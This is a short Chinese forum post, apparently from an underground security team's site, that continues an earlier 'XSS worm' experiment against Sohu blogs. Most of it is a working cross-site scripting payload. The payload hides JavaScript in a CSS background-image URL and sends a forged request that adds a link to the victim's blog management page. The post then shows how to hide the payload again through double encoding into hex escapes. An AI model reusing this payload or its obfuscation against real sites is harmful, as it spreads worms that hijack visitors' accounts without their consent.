信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
看到梦之光芒放出来了!我也不藏了!
10月7日的时候我就发的日志,提示了大家!这里算是上次发的xss worm初尝试的续吧.
其实很简单,就是两次转码.
<div style="background-image: url(javascript:var xmlhttp=new activexobject("microsoft.xmlhttp"); xmlhttp.open("get","/manage/link.do?m=add&title=s0n9%20bl09&desc=this%20is%20xss%20test%20%21&link=http%3a//s0n9.blog.sohu.com&_",true); xmlhttp.send(null);)">
ascii转码参考 http://s0n9.blog.sohu.com/16002288.html
写成下面16进制转义字符串
<div style="background-image:\0075\0072\006c\0028\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0065\0076\0061\006c\0028\0053\0074\0072\0069\006e\0067\002e\0066\0072\006f\006d\0043\0068\0061\0072\0043\006f\006......"></div>
